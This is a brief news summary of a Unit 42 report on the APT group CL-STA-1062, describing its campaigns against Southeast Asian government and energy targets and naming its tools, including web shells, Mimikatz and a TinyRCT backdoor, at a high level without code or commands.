A recent report by Unit 42 highlights the Chinese APT group CL-STA-1062, which has expanded its operations targeting Southeast Asian government and critical energy infrastructure since mid-2025. This group, previously linked to attacks on Taiwan's web infrastructure, employs ASPX web shells for infiltration, alongside a range of open-source tools including SoftEther VPN and Mimikatz.
A unique custom backdoor named TinyRCT, capable of executing commands and exfiltrating data, has also been developed by the attackers. Intrusions have led to significant data breaches and reconnaissance activities, suggesting they are working towards long-term access and control over affected networks. The report warns that these threats will likely grow, with continued assaults on energy and government entities in the region.